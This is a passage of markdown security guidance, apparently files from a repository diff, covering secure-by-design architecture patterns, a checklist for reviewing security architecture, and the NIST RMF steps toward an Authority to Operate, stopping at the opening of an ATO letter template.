- Container images, VM images, binaries
- Never modified after creation
- Versioned and signed
2. **Deployment Replaces Instances**
- Updates = deploy new version, terminate old
- No SSH into servers to patch
- No runtime configuration changes
3. **Configuration as Code**
- All config in version control
- Deployments are reproducible
- Rollback = redeploy previous version
#### Benefits
- **Security**: No drift from known-good state
- **Auditability**: All changes in version control
- **Rollback**: Redeploy previous image
- **Consistency**: Dev/staging/prod identical
#### Example: Application Updates
**Mutable (Insecure)**:
```bash
# SSH into production server
ssh prod-server
# Update code
git pull origin main
# Restart service
systemctl restart app
# Problem: No audit trail, no rollback, config drift
```
**Immutable (Secure)**:
```bash
# Build new image locally
docker build -t app:v2.1.0 .
# Push to registry (signed)
docker push registry/app:v2.1.0
# Deploy new version (Kubernetes)
kubectl set image deployment/app app=registry/app:v2.1.0
# Kubernetes: Creates new pods, terminates old pods
# Rollback if needed:
kubectl rollout undo deployment/app
# Result: Full audit trail, instant rollback, no drift
```
**Configuration Management**:
```yaml
# Configuration in Git, not edited on servers
apiVersion: v1
kind: ConfigMap
metadata:
name: app-config
data:
API_TIMEOUT: "30"
RATE_LIMIT: "1000"
# Changes = commit to Git → CI/CD applies → new deployment
```
### Pattern 3: Security Boundaries
**Principle**: Explicit trust zones with validation at every boundary crossing.
#### Boundary Identification
Trust boundaries are points where data/requests cross from lower-trust to higher-trust zones:
```
Internet (UNTRUSTED)
↓ BOUNDARY 1
API Gateway (TRUSTED)
↓ BOUNDARY 2
Application Services (TRUSTED)
↓ BOUNDARY 3
Database (HIGHLY TRUSTED)
```
#### Validation at Boundaries
At EACH boundary:
1. **Authenticate**: Verify identity
2. **Authorize**: Check permissions
3. **Validate**: Check input format/constraints
4. **Sanitize**: Remove dangerous content
5. **Log**: Record crossing
#### Example: Data Pipeline
```
External API (UNTRUSTED)
↓ BOUNDARY: API Client
Validate: JSON schema, required fields
Authenticate: API key
Rate limit: 1000 req/hour
Message Queue (SEMI-TRUSTED)
↓ BOUNDARY: Consumer
Validate: Message structure, idempotency key
Authorize: Consumer has permission for this message type
Processing Service (TRUSTED)
↓ BOUNDARY: Database Writer
Validate: Data types, constraints
Authorize: Service can write to this table
Database (HIGHLY TRUSTED)
```
**Key insight**: Never trust data just because it came from "internal" service. Validate at every boundary.
#### Minimizing Boundary Surface Area
**Large Surface Area (Insecure)**:
```
# Database accepts connections from all services
firewall: allow 0.0.0.0/0 → database:5432
# Problem: 50 services can connect, huge attack surface
```
**Small Surface Area (Secure)**:
```
# Only specific services connect to database
firewall:
allow backend-api → database:5432
allow analytics → database:5432
deny all others
# Further: Use service mesh with identity-based policies
```
### Pattern 4: Trusted Computing Base (TCB) Minimization
**Principle**: Small security-critical core, everything else untrusted.
#### What is TCB?
TCB = Components you MUST trust for security. If TCB is compromised, security fails.
**Goal**: Minimize TCB size (less code = fewer vulnerabilities).
#### Pattern: Small Critical Core
```
┌─────────────────────────────────────┐
│ Untrusted Zone (Applications) │
│ - Web servers │
│ - Application logic │
│ - User-facing services │
└────────────┬────────────────────────┘
│ API calls (validated)
┌────────────▼────────────────────────┐
│ TRUSTED COMPUTING BASE (TCB) │
│ - Authentication service (small!) │
│ - Secrets vault (minimal code) │
│ - Audit logger (append-only) │
└─────────────────────────────────────┘
```
#### Example: Secrets Management
**Large TCB (Risky)**:
```
# Every service has secrets management logic
# TCB = All 50+ services (huge attack surface)
each_service:
- Fetches secrets from vault
- Decrypts secrets
- Manages rotation
- Handles caching
# Problem: Bug in ANY service compromises secrets
```
**Small TCB (Secure)**:
```
# Secrets Vault = TCB (small, auditable, formally verified)
# Applications = Untrusted (use vault API)
Vault (TCB):
- 10,000 lines of code
- Formally verified
- Hardware-backed encryption (HSM)
- Minimal attack surface (no network egress)
Applications (Untrusted):
- Call vault API for secrets
- Vault enforces all access control
- Apps cannot access secrets they're not authorized for
# Result: Compromise application ≠ compromise vault
```
#### TCB Characteristics
1. **Small**: Minimize code size
2. **Auditable**: Can be formally verified
3. **Isolated**: Runs in separate environment (sandbox, separate machine)
4. **Minimal privileges**: TCB has no unnecessary access
5. **Heavily monitored**: All TCB access logged
### Pattern 5: Fail-Fast Security
**Principle**: Validate security properties at construction time. Refuse to operate if misconfigured.
#### Construction-Time vs Runtime
**Construction time**: When system/component is created (startup, initialization)
**Runtime**: When system is processing requests
**Fail-fast**: Validate security at construction, fail immediately if invalid.
#### Example: Security Level Validation
**Runtime Validation (Vulnerable)**:
```python
# Data pipeline starts, processes data, THEN checks security
pipeline = Pipeline()
pipeline.add_source(untrusted_datasource)
pipeline.add_sink(trusted_datasink)
pipeline.start() # Starts processing!
# Runtime: Check if datasource security level matches sink
for record in pipeline:
if record.security_level > sink.max_security_level:
raise SecurityError("Security mismatch!")
# Problem: Exposed data before detecting mismatch
# Exposure window = time until first mismatched record
```
**Fail-Fast (Secure)**:
```python
# Validate security BEFORE processing any data
pipeline = Pipeline()
pipeline.add_source(untrusted_datasource)
pipeline.add_sink(trusted_datasink)
# BEFORE start: Validate security properties
if datasource.security_level > sink.max_security_level:
raise SecurityError(
f"Cannot create pipeline: Source {datasource.security_level} "
f"exceeds sink maximum {sink.max_security_level}"
)
pipeline.start() # Only starts if validation passed
# Result: Zero exposure window, fail before processing data
```
#### Startup Validation Checklist
Validate at system startup (fail if any check fails):
- [ ] All required secrets accessible?
- [ ] TLS certificates valid and not expired?
- [ ] Database permissions granted?
- [ ] Security policies loaded?
- [ ] Encryption keys available?
#### Example: Service Startup
```python
class SecureService:
def __init__(self):
# Fail-fast validation at construction
self._validate_security()
def _validate_security(self):
# Check TLS certificate
if not self.tls_cert_valid():
raise SecurityError("TLS certificate invalid or expired")
# Check encryption keys accessible
if not self.can_access_keys():
raise SecurityError("Cannot access encryption keys")
# Check database permissions
if not self.has_required_db_permissions():
raise SecurityError("Insufficient database permissions")
# All checks passed
logger.info("Security validation passed")
def start(self):
# Only callable after __init__ validation passed
self.process_requests()
# Usage:
try:
service = SecureService() # Validates security at construction
service.start()
except SecurityError as e:
logger.error(f"Service failed security validation: {e}")
sys.exit(1) # Refuse to start with invalid security
```
**Benefits**:
- **No exposure window**: Catch misconfigurations before processing data
- **Clear errors**: Fail with specific message ("TLS cert expired")
- **Operational safety**: Misconfigured systems never reach production
## Pattern Application Framework
When designing systems, apply patterns in this order:
### 1. Identify Trust Boundaries (Security Boundaries)
Where does data cross trust zones?
### 2. Apply Zero-Trust at Each Boundary
- Authenticate + authorize every crossing
- Never trust based on network location
### 3. Minimize TCB
What MUST be trusted? Can it be smaller?
### 4. Use Immutable Infrastructure
Can deployments replace rather than update?
### 5. Add Fail-Fast Validation
Validate security at construction, refuse to start if invalid
## Quick Reference: Pattern Selection
| Situation | Pattern | Key Action |
|-----------|---------|------------|
| **Designing service-to-service communication** | Zero-Trust | mTLS + JWT + authz on every request |
| **Deciding deployment strategy** | Immutable Infrastructure | Container images, replace not update |
| **Architecting multi-tier system** | Security Boundaries | Validate + authenticate at every tier boundary |
| **Building secrets/auth service** | TCB Minimization | Small core, everything else uses API |
| **System startup logic** | Fail-Fast Security | Validate security before processing requests |
## Common Mistakes
### ❌ Implicit Trust Based on Network
**Wrong**: "Services in VPC are trusted, no auth needed"
**Right**: Zero-trust - authenticate/authorize every request even within VPC
**Why**: Network boundaries are weak. Compromised service = lateral movement without auth.
### ❌ Runtime Security Patches
**Wrong**: SSH into production, apply patch, restart
**Right**: Build new immutable image, deploy via CI/CD
**Why**: Runtime patches create drift, no audit trail, hard to rollback.
### ❌ Large Security-Critical Core
**Wrong**: Every service has secrets logic (large TCB)
**Right**: Small secrets vault (TCB), services call API (untrusted)
**Why**: Smaller TCB = fewer vulnerabilities, easier to audit/verify.
### ❌ Runtime Security Validation
**Wrong**: Start processing, check security during execution
**Right**: Validate security at construction, refuse to start if invalid
**Why**: Runtime checks have exposure windows. Fail-fast = zero exposure.
### ❌ Unclear Trust Boundaries
**Wrong**: No explicit boundaries, assume "internal is safe"
**Right**: Diagram trust zones, validate at every boundary crossing
**Why**: Boundaries are where attacks happen. Explicit validation prevents bypass.
## Cross-References
**Use BEFORE this skill**:
- `ordis/security-architect/threat-modeling` - Identify threats, then apply patterns to address them
**Use WITH this skill**:
- `ordis/security-architect/security-controls-design` - Patterns inform control choices
**Use AFTER this skill**:
- `ordis/security-architect/security-architecture-review` - Review architecture against patterns
## Real-World Impact
**Systems using secure-by-design patterns:**
- **Zero-trust + immutable infrastructure**: No successful lateral movement in 2 years despite multiple compromised services (blast radius contained by mTLS + segmentation)
- **Fail-fast validation**: Prevented VULN-004 class (security level overrides) by refusing to start pipelines with mismatched security levels
- **TCB minimization**: Secrets vault with 8,000 lines of code (vs 50+ services with embedded secrets logic) - single formal verification point instead of 50 attack surfaces
**Key lesson**: **Security built into architecture is more effective and cheaper than security added later.**

View File

@@ -0,0 +1,433 @@
# Security Architecture Review
## Overview
Systematically review designs for security issues. Core principle: **Checklist-driven review finds issues that intuition misses**.
**Key insight**: Ad-hoc review finds obvious issues. Systematic checklist finds subtle gaps.
## When to Use
Load this skill when:
- Reviewing architecture designs pre-implementation
- Conducting security audits of existing systems
- Evaluating third-party integrations
- Pre-deployment security validation
**Symptoms you need this**:
- "Is this design secure?"
- Reviewing microservices, APIs, data pipelines
- Pre-launch security check
- Compliance audit preparation
**Don't use for**:
- Threat modeling new systems (use `ordis/security-architect/threat-modeling`)
- Designing controls (use `ordis/security-architect/security-controls-design`)
- Secure patterns (use `ordis/security-architect/secure-by-design-patterns`)
## Review Process
### Step 1: Understand System
Before checklists, understand:
- **Components**: Services, databases, queues, external APIs
- **Data flows**: Where data enters/exits, trust boundaries
- **Users/actors**: Who accesses what (end users, admins, services)
- **Deployment**: Cloud/on-prem, network topology
### Step 2: Apply Checklists
For EACH area, go through checklist systematically. Check = verify present and secure.
### Step 3: Document Findings
For each issue found:
- **Description**: What's wrong
- **Severity**: Critical/High/Medium/Low
- **Impact**: What can attacker do
- **Recommendation**: How to fix
## Checklist 1: Authentication
### Credential Storage
- [ ] Passwords hashed with strong algorithm (bcrypt, Argon2, scrypt)
- [ ] NOT hashed with weak algorithms (MD5, SHA1, plain SHA256)
- [ ] Salt used per-password (not global salt or no salt)
- [ ] Key derivation with sufficient iterations (bcrypt cost ≥12, Argon2 with recommended params)
**Common Issues**:
- ❌ MD5/SHA1 hashing → CRITICAL
- ❌ No salt → HIGH
- ❌ Global salt → MEDIUM
- ❌ Low iteration count → MEDIUM
### Multi-Factor Authentication
- [ ] MFA available for all users (or at least admins)
- [ ] TOTP/hardware token support (not just SMS)
- [ ] Backup codes for account recovery
- [ ] Cannot bypass MFA via alternate login paths
**Common Issues**:
- ❌ No MFA → HIGH (for privileged accounts)
- ❌ SMS-only 2FA → MEDIUM (SIM swapping risk)
- ❌ MFA bypass path exists → HIGH
### Session Management
- [ ] Session tokens have expiration (not indefinite)
- [ ] Token expiry reasonable (hours for web, days max for mobile)
- [ ] Token rotation on sensitive actions (password change, permission change)
- [ ] Logout invalidates tokens (server-side revocation)
- [ ] Tokens stored securely (HttpOnly, Secure cookies or secure storage)
**Common Issues**:
- ❌ Non-expiring tokens → HIGH
- ❌ No logout/revocation → MEDIUM
- ❌ Tokens in localStorage (XSS vulnerable) → MEDIUM
### Password Policies
- [ ] Minimum length enforced (≥12 characters recommended)
- [ ] No maximum length (or very high max, ≥128 chars)
- [ ] Password history (prevent reuse of last N passwords)
- [ ] Account lockout after failed attempts (5-10 tries, temporary lockout)
- [ ] No common password blacklist (check against known-weak passwords)
**Common Issues**:
- ❌ No password policy → MEDIUM
- ❌ Short max length (<20 chars) → LOW
- ❌ No lockout → MEDIUM (brute-force vulnerability)
## Checklist 2: Authorization
### Access Control Model
- [ ] Clear access control model (RBAC, ABAC, MAC documented)
- [ ] Permissions defined per resource type
- [ ] Authorization checks at API layer AND data layer
- [ ] Consistent enforcement across all endpoints
**Common Issues**:
- ❌ No defined model (ad-hoc checks) → HIGH
- ❌ Authorization only at API (not data layer) → MEDIUM
- ❌ Inconsistent (some endpoints skip checks) → HIGH
### Privilege Escalation Prevention
- [ ] Users cannot modify their own roles/permissions
- [ ] API doesn't trust client-provided role claims
- [ ] Admin actions require separate authentication/approval
- [ ] No hidden admin endpoints without authorization
**Common Issues**:
- ❌ User can edit own role in profile → CRITICAL
- ❌ Trusting `X-User-Role` header from client → CRITICAL
- ❌ Hidden `/admin` path without authz → HIGH
### Resource-Level Authorization
- [ ] Authorization checks "Can THIS user access THIS resource?"
- [ ] Not just "Is user logged in?" or "Is user admin?"
- [ ] Users can only access their own data (unless explicitly shared)
- [ ] Object-level permission checks (IDOR prevention)
**Common Issues**:
- ❌ Check login only, not resource ownership → HIGH (IDOR vulnerability)
-`/api/users/{user_id}` allows any authenticated user → HIGH
### Default-Deny Principle
- [ ] All endpoints require authentication by default
- [ ] Explicit allow-list for public endpoints
- [ ] Authorization failures return 403 Forbidden (not 404)
- [ ] No "development mode" backdoors in production
**Common Issues**:
- ❌ Default-allow (must explicitly mark secure) → HIGH
- ❌ Returning 404 instead of 403 → LOW (information disclosure)
- ❌ Debug/dev endpoints enabled in production → CRITICAL
## Checklist 3: Secrets Management
### Secrets Storage
- [ ] No secrets in source code
- [ ] No secrets in config files committed to Git
- [ ] No secrets in environment variables visible in UI
- [ ] Secrets stored in secrets manager (Vault, AWS Secrets Manager, etc.)
- [ ] Secrets encrypted at rest
**Common Issues**:
- ❌ Secrets in Git history → CRITICAL
- ❌ Secrets in config.yaml → CRITICAL
- ❌ Database password in Dockerfile → HIGH
### Secrets Rotation
- [ ] Secrets have rotation schedule (monthly/quarterly)
- [ ] Rotation is automated or documented
- [ ] Application supports zero-downtime rotation
- [ ] Old secrets revoked after rotation
**Common Issues**:
- ❌ No rotation policy → MEDIUM
- ❌ Manual rotation without documentation → LOW
- ❌ Rotation requires downtime → LOW
### Access Control to Secrets
- [ ] Secrets access restricted by service identity
- [ ] Least privilege (service accesses only its secrets)
- [ ] Audit log of secrets access
- [ ] No shared secrets across services
**Common Issues**:
- ❌ All services can access all secrets → MEDIUM
- ❌ No audit log → LOW
- ❌ Shared API key for multiple services → MEDIUM
## Checklist 4: Data Flow
### Trust Boundary Identification
- [ ] Trust boundaries documented (external → API → services → database)
- [ ] Each boundary has validation rules
- [ ] No implicit trust based on network location
**Common Issues**:
- ❌ No documented boundaries → MEDIUM
- ❌ "Internal network = trusted" assumption → HIGH
### Input Validation at Boundaries
- [ ] All external input validated (type, format, range)
- [ ] Validation at EVERY trust boundary (not just entry point)
- [ ] Allow-list validation (define what's allowed, reject rest)
- [ ] Input validation errors logged
**Common Issues**:
- ❌ No validation at internal boundaries → MEDIUM
- ❌ Deny-list only (blacklist can be bypassed) → MEDIUM
- ❌ Validation at UI only (not API) → HIGH
### Output Encoding for Context
- [ ] Output encoded for destination context (HTML, SQL, shell, etc.)
- [ ] SQL parameterized queries (no string concatenation)
- [ ] HTML escaped when rendering user data
- [ ] JSON encoded when returning API responses
**Common Issues**:
- ❌ String concatenation for SQL → CRITICAL (SQL injection)
- ❌ Unescaped HTML → HIGH (XSS)
- ❌ Unescaped shell commands → CRITICAL (command injection)
### Data Classification and Handling
- [ ] Sensitive data identified (PII, secrets, financial)
- [ ] Sensitive data encrypted in transit
- [ ] Sensitive data encrypted at rest
- [ ] Sensitive data not logged
- [ ] Data retention policy defined
**Common Issues**:
- ❌ PII in plaintext logs → HIGH
- ❌ No encryption for sensitive data → HIGH
- ❌ No data retention policy → MEDIUM
## Checklist 5: Network Security
### TLS/Encryption in Transit
- [ ] All external traffic uses TLS (HTTPS, not HTTP)
- [ ] TLS 1.2 or 1.3 only (TLS 1.0/1.1 disabled)
- [ ] Strong cipher suites (no RC4, 3DES, MD5)
- [ ] HSTS header present (HTTP Strict Transport Security)
**Common Issues**:
- ❌ HTTP allowed → CRITICAL
- ❌ TLS 1.0 enabled → HIGH
- ❌ Weak ciphers → MEDIUM
- ❌ No HSTS → LOW
### Certificate Validation
- [ ] TLS certificates validated (not self-signed in production)
- [ ] Certificate expiry monitored
- [ ] Certificate revocation checking (OCSP/CRL)
- [ ] No certificate validation bypass in code
**Common Issues**:
- ❌ Self-signed certs in production → HIGH
-`verify=False` in code → CRITICAL
- ❌ No expiry monitoring → MEDIUM
### Network Segmentation
- [ ] Database not directly accessible from internet
- [ ] Services in separate subnets/VPCs
- [ ] Admin interfaces on separate network
- [ ] Internal services use mTLS or VPN
**Common Issues**:
- ❌ Database exposed to internet → CRITICAL
- ❌ All services in same flat network → MEDIUM
- ❌ Admin panel on public internet → HIGH
### Firewall Rules and Least-Necessary Access
- [ ] Firewall rules documented
- [ ] Default-deny firewall policy
- [ ] Only necessary ports open
- [ ] Source IP restrictions for sensitive endpoints
**Common Issues**:
- ❌ Default-allow firewall → HIGH
- ❌ All ports open → MEDIUM
- ❌ No source restrictions → MEDIUM
## Severity Guidelines
Use these guidelines to assign severity:
### Critical
- Direct path to data breach or system compromise
- **Examples**: SQL injection, secrets in Git, authentication bypass
### High
- Significant security impact, requires immediate attention
- **Examples**: Weak password hashing, no MFA for admins, IDOR vulnerability
### Medium
- Security weakness that should be addressed
- **Examples**: No password policy, inconsistent authorization, no audit logging
### Low
- Minor issue or hardening opportunity
- **Examples**: Information disclosure via error messages, missing HSTS header
## Review Report Template
```markdown
# Security Architecture Review
**System**: [System Name]
**Review Date**: [Date]
**Reviewer**: [Name]
## Executive Summary
[1-2 paragraph overview: Critical/High count, key findings, overall risk level]
## Findings
### Critical (Count: X)
#### 1. [Finding Title]
- **Area**: Authentication / Authorization / Secrets / Data Flow / Network
- **Description**: [What's wrong]
- **Impact**: [What attacker can do]
- **Recommendation**: [How to fix]
- **Affected Components**: [API Service, Database, etc.]
### High (Count: X)
[Same format as Critical]
### Medium (Count: X)
[Same format]
### Low (Count: X)
[Same format]
## Summary Table
| Finding | Severity | Area | Status |
|---------|----------|------|--------|
| SQL injection in /api/users | Critical | Data Flow | Open |
| Secrets in Git | Critical | Secrets | Open |
| No MFA for admins | High | Authentication | Open |
## Next Steps
1. Address Critical findings immediately (timeline: 1 week)
2. Address High findings (timeline: 2-4 weeks)
3. Schedule Medium/Low findings (timeline: 1-3 months)
```
## Quick Reference: Checklist Summary
| Area | Key Checks |
|------|------------|
| **Authentication** | Strong hashing (bcrypt), MFA, token expiry, lockout policy |
| **Authorization** | RBAC/ABAC model, resource-level checks, default-deny, no privilege escalation |
| **Secrets** | Not in Git, secrets manager, rotation policy, access control |
| **Data Flow** | Trust boundaries, input validation, output encoding, data classification |
| **Network** | TLS 1.2+, certificate validation, segmentation, firewall rules |
## Common Mistakes
### ❌ Ad-Hoc Review Without Checklist
**Wrong**: Review design intuitively, find obvious issues, call it done
**Right**: Systematically go through all 5 checklists, check every item
**Why**: Intuition finds 50% of issues. Checklist finds 90%.
### ❌ Stopping After Finding First Issues
**Wrong**: Find SQL injection, report it, stop review
**Right**: Complete full checklist review even after finding critical issues
**Why**: Systems often have multiple unrelated vulnerabilities.
### ❌ Vague Recommendations
**Wrong**: "Improve authentication security"
**Right**: "Replace MD5 with bcrypt (cost factor 12), add salt per-password"
**Why**: Specific recommendations are actionable. Vague ones are ignored.
### ❌ Missing Severity Assignment
**Wrong**: List issues without severity
**Right**: Assign Critical/High/Medium/Low to prioritize fixes
**Why**: Teams need to know what to fix first.
## Cross-References
**Use BEFORE this skill**:
- `ordis/security-architect/threat-modeling` - Understand threats, then review if design addresses them
**Use WITH this skill**:
- `muna/technical-writer/documentation-structure` - Document review as ADR or report
**Use AFTER this skill**:
- `ordis/security-architect/security-controls-design` - Design fixes for identified issues
## Real-World Impact
**Systematic reviews using these checklists:**
- **Pre-launch review caught SQL injection** in `/api/users/{id}` endpoint (would have been CRITICAL production vulnerability)
- **Checklist found secrets in Git history** across 3 repositories (developers missed it in manual review)
- **Authorization review found 12 IDOR vulnerabilities** where `/api/orders/{order_id}` didn't check ownership (intuitive review found only 2)
**Key lesson**: **Systematic checklist review finds 3-5x more issues than ad-hoc intuitive review.**

View File

@@ -0,0 +1,757 @@
# Security Authorization and Accreditation
## Overview
Navigate government/defense security authorization processes. Core principle: **Authorization is risk acceptance by an official with authority**.
**Key insight**: ATO is not a checklist - it's formal risk acceptance documentation enabling informed decision-making by leadership.
## When to Use
Load this skill when:
- Deploying systems for government/defense
- Preparing for ATO (Authority to Operate)
- Connecting to classified networks
- Formal security testing and evaluation
**Symptoms you need this**:
- "How do I get ATO for production?"
- Government/defense contracts requiring authorization
- "What is an SSP/SAR/POA&M?"
- Preparing for security assessment
**Don't use for**:
- Commercial compliance (use `ordis/security-architect/compliance-awareness-and-mapping`)
- General security (use `ordis/security-architect/security-controls-design`)
## The Authorization Process
### Core Concept: Risk Management Framework (RMF)
**RMF** (NIST SP 800-37) has 7 steps:
```
1. PREPARE → 2. CATEGORIZE → 3. SELECT → 4. IMPLEMENT → 5. ASSESS → 6. AUTHORIZE → 7. MONITOR
↓ ↓ ↓ ↓ ↓ ↓ ↓
Planning Impact Level Controls Build System Test Get ATO Ongoing Ops
```
### Step 1: PREPARE (Pre-Authorization)
**Activities**:
- Define authorization boundary (what's in scope?)
- Identify Authorizing Official (AO) - person with authority to accept risk
- Assemble authorization team (ISSM, ISSO, assessors)
- Review organizational risk tolerance
**Deliverable**: Authorization strategy and team assigned
### Step 2: CATEGORIZE (Impact Analysis)
**Activities**:
- Security categorization using FIPS 199
- Determine impact level: Low, Moderate, or High
- Based on Confidentiality, Integrity, Availability (CIA)
**Impact Levels**:
```
Low: Limited adverse effect
Moderate: Serious adverse effect
High: Severe or catastrophic adverse effect
```
**Example**:
```
System: Healthcare Records Database
Confidentiality: HIGH (patient privacy breach = severe impact)
Integrity: HIGH (incorrect medical records = life-threatening)
Availability: MODERATE (temporary outage = serious but not life-threatening)
Overall System Impact: HIGH (highest of C/I/A)
```
**Deliverable**: Security categorization document
### Step 3: SELECT (Control Selection)
**Activities**:
- Select control baseline (NIST SP 800-53)
- Low baseline → 125 controls
- Moderate baseline → 325 controls
- High baseline → 421 controls
- Tailor controls (add/remove based on organizational needs)
**Control Families**:
- AC (Access Control)
- AT (Awareness and Training)
- AU (Audit and Accountability)
- CA (Assessment, Authorization, and Monitoring)
- CM (Configuration Management)
- CP (Contingency Planning)
- IA (Identification and Authentication)
- IR (Incident Response)
- MA (Maintenance)
- MP (Media Protection)
- PE (Physical and Environmental Protection)
- PL (Planning)
- PS (Personnel Security)
- RA (Risk Assessment)
- SA (System and Services Acquisition)
- SC (System and Communications Protection)
- SI (System and Information Integrity)
**Deliverable**: Control baseline with tailoring decisions
### Step 4: IMPLEMENT (Build System with Controls)
**Activities**:
- Implement selected security controls
- Document implementation in SSP (System Security Plan)
- Common control inheritance (use organization-wide controls)
**Example Control Implementation**:
```
Control: AC-2 (Account Management)
Implementation:
- All accounts created via ServiceNow ticket
- Manager approval required
- Accounts disabled after 30 days inactivity
- Monthly access reviews by data owners
- Evidence: ServiceNow workflow, access review reports
```
**Deliverable**: Implemented system with documented controls (SSP)
### Step 5: ASSESS (Security Assessment)
**Activities**:
- Independent assessment by certified assessor
- Test controls (interviews, configuration review, penetration testing)
- Document findings in SAR (Security Assessment Report)
- Classify findings by severity (Critical/High/Medium/Low)
**Assessment Methods**:
- **Examine**: Review documentation, configurations, logs
- **Interview**: Question staff about procedures
- **Test**: Execute tests (penetration test, scan, functional test)
**Deliverable**: SAR (Security Assessment Report) with findings
### Step 6: AUTHORIZE (Risk Acceptance)
**Activities**:
- Remediate or accept findings
- Create POA&M (Plan of Action & Milestones) for residual risks
- Authorizing Official reviews SSP + SAR + POA&M
- AO makes risk acceptance decision
- Issue ATO (Authority to Operate) or denial
**ATO Types**:
- **Full ATO**: System fully compliant, authorized for 3 years
- **Interim ATO (IATO)**: Temporary authorization (6-12 months) with conditions
- **Denial**: System does not meet minimum security requirements
**Deliverable**: ATO Letter from Authorizing Official
### Step 7: MONITOR (Continuous Monitoring)
**Activities**:
- Ongoing assessment of controls
- Change impact analysis (new vulnerabilities, configuration changes)
- Update POA&M as risks remediated
- Annual re-assessment or earlier if major changes
- Trigger re-authorization when needed
**Deliverable**: Continuous monitoring reports, updated POA&M
## Key Documents
### 1. SSP (System Security Plan)
**Purpose**: Comprehensive description of the system and its security controls.
**Contents**:
```markdown
# System Security Plan (SSP)
## 1. System Identification
- System name, acronym, unique identifier
- System owner, ISSO, ISSM contact info
- Authorization boundary (what's included/excluded)
## 2. System Categorization
- FIPS 199 categorization (Low/Moderate/High)
- CIA impact levels with justification
- Overall system impact level
## 3. System Description
- System purpose and functionality
- Users and use cases
- Data types processed (PII, classified, etc.)
- System architecture diagram
- Network diagram with trust boundaries
- Technology stack (OS, database, languages)
## 4. Authorization Boundary
- Components within boundary (servers, databases, networks)
- External connections (APIs, data feeds)
- Interconnection agreements for external systems
## 5. Security Control Implementation
For EACH control in baseline:
### AC-2: Account Management
**Control Requirement**: Organization manages information system accounts
**Implementation**:
- ServiceNow ticketing system for account requests
- Manager approval required via workflow
- Automated 30-day inactivity disablement
- Monthly access reviews by data owners
**Responsible Role**: System Administrator
**Assessment Procedure**:
- Interview: Ask sysadmins about account creation process
- Examine: Review ServiceNow tickets, approval records
- Test: Attempt to create account without approval (should fail)
**Evidence Location**:
- ServiceNow workflow documentation: /docs/account-mgmt.pdf
- Sample access review: /evidence/access-review-2025-01.xlsx
(Repeat for all ~125-421 controls depending on baseline)
## 6. Related Documents
- Contingency Plan (CP)
- Incident Response Plan (IRP)
- Configuration Management Plan (CMP)
- Continuous Monitoring Plan
## 7. Approval Signatures
- System Owner: [Signature] [Date]
- ISSO: [Signature] [Date]
- ISSM: [Signature] [Date]
```
**Typical Length**: 200-500 pages for HIGH system
### 2. SAR (Security Assessment Report)
**Purpose**: Independent assessment results documenting control effectiveness.
**Contents**:
```markdown
# Security Assessment Report (SAR)
## Executive Summary
- System assessed: [Name]
- Assessment dates: [Start] to [End]
- Assessor: [Name, Credentials]
- Overall assessment: [Pass with findings / Conditional / Fail]
- Critical findings: [Count]
- High findings: [Count]
- Recommendations: [Summary]
## Assessment Scope
- Controls assessed: [List control families or specific controls]
- Assessment methods: Examine, Interview, Test
- Limitations: [Any scope exclusions or constraints]
## Assessment Results by Control
### AC-2: Account Management
**Assessment Procedures**:
1. Interview: System administrators (2025-03-15)
2. Examine: ServiceNow workflow, access review reports
3. Test: Attempted unauthorized account creation
**Finding AC-2-001: MEDIUM**
**Status**: OPEN
**Description**: Access reviews conducted monthly but no evidence of remediation for identified excessive privileges. 3 accounts with admin access had not logged in for 6 months but remain enabled.
**Risk**: Dormant privileged accounts increase attack surface.
**Recommendation**: Implement automated disablement of inactive admin accounts within 30 days. Conduct immediate review of all privileged accounts.
**AO Response**: Accepted. Remediation planned in POA&M item #5.
**Overall Control Result**: PARTIALLY SATISFIED (findings require remediation)
(Repeat for all assessed controls)
## Findings Summary
| Finding ID | Control | Severity | Status | Remediation Due |
|------------|---------|----------|--------|-----------------|
| AC-2-001 | AC-2 | Medium | Open | 2025-06-01 |
| IA-5-001 | IA-5 | High | Open | 2025-04-15 |
| SC-7-001 | SC-7 | Low | Open | 2025-08-01 |
## Assessor Recommendation
Recommend INTERIM ATO for 6 months conditional on remediation of HIGH findings within 30 days. Re-assessment required before full ATO.
**Assessor Signature**: [Name] [Date]
```
**Typical Length**: 100-300 pages
### 3. POA&M (Plan of Action & Milestones)
**Purpose**: Track remediation of security weaknesses and residual risks.
**Contents**:
```markdown
# Plan of Action & Milestones (POA&M)
## POA&M Item #1
**Finding ID**: IA-5-001 (from SAR)
**Control**: IA-5 (Authenticator Management)
**Weakness**: Password policy allows 8-character passwords; NIST recommends minimum 12 characters.
**Risk Level**: HIGH
**Risk Description**: Weak passwords vulnerable to brute-force attacks. Estimated 15% of user accounts have 8-character passwords.
**Milestones**:
- [ ] Milestone 1: Update password policy to require 12 characters (2025-04-01) - System Admin
- [ ] Milestone 2: Force password reset for all 8-char passwords (2025-04-15) - System Admin
- [ ] Milestone 3: Verify 100% compliance via audit query (2025-04-20) - ISSO
- [ ] Milestone 4: Provide evidence to assessor (2025-04-25) - ISSO
**Resources Required**: 40 hours engineering time, communication campaign for users
**Status**: IN PROGRESS (Milestone 1 complete, Milestone 2 in progress)
**Scheduled Completion**: 2025-04-25
**Actual Completion**: [TBD]
## POA&M Item #2
**Finding ID**: AC-2-001 (from SAR)
**Control**: AC-2 (Account Management)
**Weakness**: Dormant privileged accounts not automatically disabled.
**Risk Level**: MEDIUM
**Milestones**:
- [ ] Implement automated script to disable admin accounts after 30 days inactivity (2025-05-01)
- [ ] Immediate review and disable of current dormant admin accounts (2025-04-10)
- [ ] Monthly verification report to ISSO (ongoing)
**Scheduled Completion**: 2025-05-01
## POA&M Item #3 (Risk Acceptance)
**Finding ID**: SC-8-001
**Control**: SC-8 (Transmission Confidentiality)
**Weakness**: Legacy internal API uses HTTP (not HTTPS) for non-sensitive configuration data.
**Risk Level**: LOW
**Recommendation**: Migrate to HTTPS
**AO Decision**: RISK ACCEPTED
**Justification**:
- API only accessible on isolated management network (not exposed to internet)
- Data transmitted is non-sensitive system configuration (no PII, credentials, or classified data)
- Migration to HTTPS requires vendor upgrade (cost: $50k, timeline: 12 months)
- Risk mitigated by network segmentation
**Acceptance Date**: 2025-03-20
**Acceptance Authority**: Authorizing Official [Name]
**Re-evaluation Date**: 2026-03-20 (annual review)
**POA&M Metrics**:
- Total items: 15
- Critical: 0
- High: 1 (in progress)
- Medium: 8 (6 in progress, 2 accepted risk)
- Low: 6 (4 in progress, 2 accepted risk)
```
**Updates**: Monthly or when milestone completed
### 4. ATO Letter (Authority to Operate)
**Purpose**: Formal authorization from Authorizing Official.
**Contents**:
```markdown
MEMORANDUM FOR: System Owner, [Name]
